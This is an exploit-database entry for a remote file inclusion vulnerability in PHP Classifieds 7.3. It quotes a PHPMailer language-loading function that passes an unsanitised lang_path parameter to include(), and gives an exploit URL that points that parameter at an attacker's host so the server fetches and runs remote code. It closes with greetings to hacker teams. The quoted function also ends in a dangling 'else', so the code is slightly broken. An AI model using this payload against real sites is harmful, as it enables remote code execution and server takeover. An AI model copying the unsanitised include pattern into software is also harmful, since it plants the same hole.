PHP Classifieds 7.3 - Remote File Inclusion



EKU-ID: 21264 CVE: CVE-2010-4914;OSVDB-76202 OSVDB-ID:
Author: alsa7r Published: 2010-09-04 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


==================================
  PHP Classifieds v7.3 RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability
[x] DatE          : 09 September 2010
[x] AutH0r        : alsa7r
[x] Contact       : TBT9@hotmail.com
[x] TestEd 0n     : windows 7
[x] d0rK          : :P
====================================================

==========================================================================================
[x]bug heRe:
 function SetLanguage($lang_type, $lang_path = "tools/phpmailer/language/") {
    	//echo $lang_path.'phpmailer.lang-'.$lang_type.'.php';
        if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php'))
            include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
        else if(file_exists($lang_path.'phpmailer.lang-en.php'))
            include($lang_path.'phpmailer.lang-en.php');
        else
    }
==========================================================================================

==================================================================
[x]expL0iT:
http://[site]/classifieds/tools/phpmailer/class.phpmailer.php?lang_path=[EV!L]
==================================================================

============================================================================================
[x]th4nKs t0:
Mr.wolf , morabko , unit x team , sudan hacker team
============================================================================================

=====================
TBT9[at]hotmail[dot]com
=====================